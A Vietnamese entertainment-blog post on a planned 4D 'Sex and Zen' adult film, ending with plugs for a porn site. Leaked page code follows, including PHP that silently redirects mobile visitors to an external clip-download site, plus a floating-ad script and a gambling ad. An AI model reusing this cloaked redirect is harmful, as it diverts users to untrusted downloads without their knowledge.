TIN HOT: Sex and Zen 4D cùng Sora Aoi sắp được trình chiếu

Filed under: TIN TỨC 9X |

Ghế sẽ rung trong những cảnh nhạy cảm, các nhà sản xuất phim Hong Kong còn muốn mời cả diễn viên nữ người Nhật tham gia sản phẩm của mình.

Một vài người phàn nàn rằng phim 3D “Sex and Zen” không đủ đem lại cảm giác mạnh cho họ, bây giờ họ sắp sửa được thưởng thức “phim người lớn” 4D trên màn ảnh rộng.

Kế hoạch về việc sản xuất và phát hành phim 4D đã được một trong những công ty điện ảnh tại Hong Kong đưa ra. Nhà sản xuất đưa ra ý tưởng rằng, ghế ngồi sẽ rung trong những pha hành động hoặc… nhạy cảm và chắc chắn sẽ đem lại sự thích thú cho những người phù hợp.

Công nghệ này đã được cài đặt trong hai rạp chiếu tại Hong Kong, nơi mới đây đã chiếu bộ phim Pirate of Caribean.

 

Ngành công nghiệp người lớn đang thu được
những khoản lợi nhuận khổng lồ nhờ công nghệ mới

Năm 2011, “Sex and Zen” 3D đã đánh bại hoàn toàn siêu phẩm Avatar để thu về doanh số cao nhất tại Hong Kong. Năm nay, các nhà sản xuất Hong Kong dự tính sẽ mời các chuyên gia và diễn viên nữ của ngành “công nghiệp người lớn” tại Nhật Bản, Đài Loan sẽ tham dự bộ phim, đồng thời hi vọng rằng “yếu tố nước ngoài” sẽ mang lại hơn 5.15 triệu USD lợi nhuận cho họ.

Tại Trung Quốc, những bộ phim người lớn vẫn đang bị cấm tại rạp, nhưng Hong Kong được phép áp dụng cơ chế thoáng hơn và những khách hàng giàu có tại Đại lục vẫn thường thông qua các công ty du lịch, tới Hong Kong để xem các bộ phim khiêu dâm.

Phim khiêu dâm 4D sẽ được bấm máy vào cuối năm nay và xuất hiện vào mùa hè năm 2013. Tại Việt Nam, một số rạp như Quốc gia, rạp Kim Đồng cũng cung cấp những bộ phim ngắn 4D. Tuy nhiên, thời điểm này chưa phù hợp để những bộ phim người lớn 4D được phép chiếu tại Việt Nam, mặc dù điều đó là hợp pháp ở một vài nước trên thế giới.

Các bạn nhớ thường xuyên ghé thăm www.kieunu.info để có bản phim mới nhất nhé.

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88